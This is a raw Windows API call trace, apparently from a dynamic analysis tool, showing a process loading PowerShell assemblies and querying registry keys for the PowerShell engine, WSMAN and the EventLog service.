	[0164.000] ReadFile (in: hFile=0x32c, lpBuffer=0x3341a9a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3341a9a*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0164.000] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0164.000] CloseHandle (hObject=0x32c) returned 1
	[0164.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.001] SetErrorMode (uMode=0x1) returned 0x1
	[0164.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1dcd90 | out: lpFileInformation=0x1dcd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0164.001] SetErrorMode (uMode=0x1) returned 0x1
	[0164.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dce78 | out: phkResult=0x1dce78*=0x32c) returned 0x0
	[0164.001] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dcdfc, lpData=0x0, lpcbData=0x1dcdf8*=0x0 | out: lpType=0x1dcdfc*=0x1, lpData=0x0, lpcbData=0x1dcdf8*=0x56) returned 0x0
	[0164.001] CoTaskMemAlloc (cb=0x5a) returned 0x4708a0
	[0164.001] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dcdcc, lpData=0x4708a0, lpcbData=0x1dcdc8*=0x56 | out: lpType=0x1dcdcc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1dcdc8*=0x56) returned 0x0
	[0164.001] CoTaskMemFree (pv=0x4708a0) 
	[0164.002] RegCloseKey (hKey=0x32c) returned 0x0
	[0164.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0164.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0164.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0164.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0164.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0164.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0164.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0164.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0164.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0164.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0164.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0164.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0174.109] VirtualQuery (in: lpAddress=0x1db910, lpBuffer=0x1dc7d0, dwLength=0x30 | out: lpBuffer=0x1dc7d0*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.110] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x2807e0df, Data2=0x9b35, Data3=0x4d8d, Data4=([0]=0xba, [1]=0x41, [2]=0xc2, [3]=0x34, [4]=0xa5, [5]=0x3e, [6]=0xc2, [7]=0xb5))) returned 0x0
	[0174.111] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x6f21fde4, Data2=0x66d3, Data3=0x4f42, Data4=([0]=0xbb, [1]=0x57, [2]=0xf5, [3]=0x6d, [4]=0x12, [5]=0x48, [6]=0x72, [7]=0xb6))) returned 0x0
	[0174.112] VirtualQuery (in: lpAddress=0x1dbac0, lpBuffer=0x1dc980, dwLength=0x30 | out: lpBuffer=0x1dc980*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.113] VirtualQuery (in: lpAddress=0x1dbac0, lpBuffer=0x1dc980, dwLength=0x30 | out: lpBuffer=0x1dc980*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.114] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0xe09b880, Data2=0xafac, Data3=0x4d1e, Data4=([0]=0xa0, [1]=0x3d, [2]=0xb, [3]=0x5c, [4]=0x94, [5]=0x7f, [6]=0x9e, [7]=0x3f))) returned 0x0
	[0174.116] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x32f88ac6, Data2=0x5d1a, Data3=0x41c8, Data4=([0]=0x83, [1]=0x2f, [2]=0xa1, [3]=0x26, [4]=0xff, [5]=0xe8, [6]=0x68, [7]=0x62))) returned 0x0
	[0174.117] VirtualQuery (in: lpAddress=0x1dbd10, lpBuffer=0x1dcbd0, dwLength=0x30 | out: lpBuffer=0x1dcbd0*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0174.120] VirtualQuery (in: lpAddress=0x1db380, lpBuffer=0x1dc240, dwLength=0x30 | out: lpBuffer=0x1dc240*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.621] VirtualQuery (in: lpAddress=0x1db0b0, lpBuffer=0x1dbf70, dwLength=0x30 | out: lpBuffer=0x1dbf70*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.622] VirtualQuery (in: lpAddress=0x1db140, lpBuffer=0x1dc000, dwLength=0x30 | out: lpBuffer=0x1dc000*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.623] VirtualQuery (in: lpAddress=0x1db8c0, lpBuffer=0x1dc780, dwLength=0x30 | out: lpBuffer=0x1dc780*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.624] VirtualQuery (in: lpAddress=0x1db8c0, lpBuffer=0x1dc780, dwLength=0x30 | out: lpBuffer=0x1dc780*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.626] VirtualQuery (in: lpAddress=0x1db8c0, lpBuffer=0x1dc780, dwLength=0x30 | out: lpBuffer=0x1dc780*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0200.046] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.046] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.047] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.047] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.049] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.049] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.050] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.050] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.060] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.060] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.064] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.064] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.065] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0200.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0200.065] CoTaskMemFree (pv=0x3c3ed0) 
	[0200.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd088 | out: phkResult=0x1dd088*=0x324) returned 0x0
	[0200.274] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1dcf8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1dcf8c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf88*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0200.274] CoTaskMemFree (pv=0x0) 
	[0200.275] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0200.275] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x408e50, lpcchValueName=0x1dd038, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1dd038, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0200.276] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1dd01c, lpData=0x0, lpcbData=0x1dd018*=0x0 | out: lpType=0x1dd01c*=0x1, lpData=0x0, lpcbData=0x1dd018*=0x8) returned 0x0
	[0200.276] CoTaskMemAlloc (cb=0xc) returned 0x48fbd0
	[0200.276] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1dcfec, lpData=0x48fbd0, lpcbData=0x1dcfe8*=0x8 | out: lpType=0x1dcfec*=0x1, lpData="2.0", lpcbData=0x1dcfe8*=0x8) returned 0x0
	[0203.685] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dcfd8 | out: phkResult=0x1dcfd8*=0x32c) returned 0x0
	[0203.685] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1dcedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1dcedc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dced8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.685] CoTaskMemFree (pv=0x0) 
	[0203.685] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0203.685] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x408e50, lpcchValueName=0x1dcf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1dcf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.685] CoTaskMemFree (pv=0x408e50) 
	[0203.685] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0203.685] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x408e50, lpcchValueName=0x1dcf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1dcf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.685] CoTaskMemFree (pv=0x408e50) 
	[0203.685] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0203.685] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x408e50, lpcchValueName=0x1dcf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1dcf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.685] CoTaskMemFree (pv=0x408e50) 
	[0203.685] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1dcf6c, lpData=0x0, lpcbData=0x1dcf68*=0x0 | out: lpType=0x1dcf6c*=0x1, lpData=0x0, lpcbData=0x1dcf68*=0x8) returned 0x0
	[0203.685] CoTaskMemAlloc (cb=0xc) returned 0x48faf0
	[0203.685] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1dcf3c, lpData=0x48faf0, lpcbData=0x1dcf38*=0x8 | out: lpType=0x1dcf3c*=0x1, lpData="2.0", lpcbData=0x1dcf38*=0x8) returned 0x0
	[0203.685] CoTaskMemFree (pv=0x48faf0) 
	[0203.686] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0203.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0203.687] CoTaskMemFree (pv=0x3c3ed0) 
	[0204.206] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0204.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.206] CoTaskMemFree (pv=0x3c3ed0) 
	[0204.210] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd008 | out: phkResult=0x1dd008*=0x328) returned 0x0
	[0204.216] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1dcf7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf78, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1dcf7c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1dcf78*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.216] CoTaskMemFree (pv=0x0) 
	[0204.217] CoTaskMemAlloc (cb=0x204) returned 0x408e50
	[0204.217] RegEnumKeyExW (in: hKey=0x328, dwIndex=0x0, lpName=0x408e50, lpcchName=0x1dd008, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1dd008, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.218] CoTaskMemFree (pv=0x408e50) 
	[0204.218] CoTaskMemFree (pv=0x0) 
